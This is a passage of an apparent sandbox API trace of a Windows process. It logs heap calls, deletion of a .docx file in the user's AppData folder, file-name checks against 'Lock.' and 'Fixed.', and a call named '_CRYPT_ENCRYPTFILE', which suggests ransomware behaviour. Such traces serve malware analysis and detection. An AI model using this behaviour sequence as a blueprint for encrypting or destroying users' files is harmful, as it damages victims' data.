[0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0222.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0222.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0222.168] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0222.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0222.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0222.168] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0222.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0222.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0222.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0222.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0222.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0222.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0222.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0222.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0222.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0222.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0222.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0222.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0222.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0222.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0222.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0222.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c) returned 0x3be0dd0 [0222.169] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/3P0loyjD.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\3P0loyjD.docx", lpFilePart=0x8cedf4*="3P0loyjD.docx") returned 0x2d [0222.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0222.169] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\3P0loyjD.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\3p0loyjd.docx")) returned 0x20 [0222.170] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\3P0loyjD.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8887a660, ftCreationTime.dwHighDateTime=0x1d5eeaa, ftLastAccessTime.dwLowDateTime=0x448120a0, ftLastAccessTime.dwHighDateTime=0x1d5edbe, ftLastWriteTime.dwLowDateTime=0x448120a0, ftLastWriteTime.dwHighDateTime=0x1d5edbe, nFileSizeHigh=0x0, nFileSizeLow=0xca26, dwReserved0=0x1, dwReserved1=0x1c, cFileName="3P0loyjD.docx", cAlternateFileName="3P0LOY~1.DOC")) returned 0xa87550 [0222.170] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\3P0loyjD.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\3p0loyjd.docx")) returned 1 [0222.254] FindNextFileW (in: hFindFile=0xa87550, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8887a660, ftCreationTime.dwHighDateTime=0x1d5eeaa, ftLastAccessTime.dwLowDateTime=0x448120a0, ftLastAccessTime.dwHighDateTime=0x1d5edbe, ftLastWriteTime.dwLowDateTime=0x448120a0, ftLastWriteTime.dwHighDateTime=0x1d5edbe, nFileSizeHigh=0x0, nFileSizeLow=0xca26, dwReserved0=0x1, dwReserved1=0x1c, cFileName="3P0loyjD.docx", cAlternateFileName="3P0LOY~1.DOC")) returned 0 [0222.254] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0222.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0222.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0222.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0222.254] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0222.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0222.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0222.255] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0222.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0222.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0222.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0222.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0222.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0222.255] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/3P0loyjD.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\3P0loyjD.docx", lpFilePart=0x8cf650*="3P0loyjD.docx") returned 0x2d [0222.255] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\3P0loyjD.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\3p0loyjd.docx")) returned 0xffffffff [0222.255] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.256] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.256] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0222.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0222.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0222.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0222.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0222.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6KDjX0CerhkJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KDjX0CerhkJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DjX0CerhkJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jX0CerhkJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X0CerhkJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0CerhkJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CerhkJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="erhkJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rhkJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hkJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kJtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JtgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tgMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mw88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="88.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.257] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0222.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0222.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0222.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0222.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6KDjX0CerhkJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KDjX0CerhkJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DjX0CerhkJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jX0CerhkJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X0CerhkJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0CerhkJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CerhkJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="erhkJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rhkJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hkJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kJtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JtgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tgMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mw88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="88.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.258] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0222.258] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0222.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0222.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0222.258] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0222.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0222.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0222.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0222.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0222.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0222.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0222.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0222.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.259] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x3be0dd0 [0222.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0222.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0222.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0222.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0222.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0222.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0222.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0222.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0222.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0222.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0222.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0222.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0222.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0222.261] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.261] 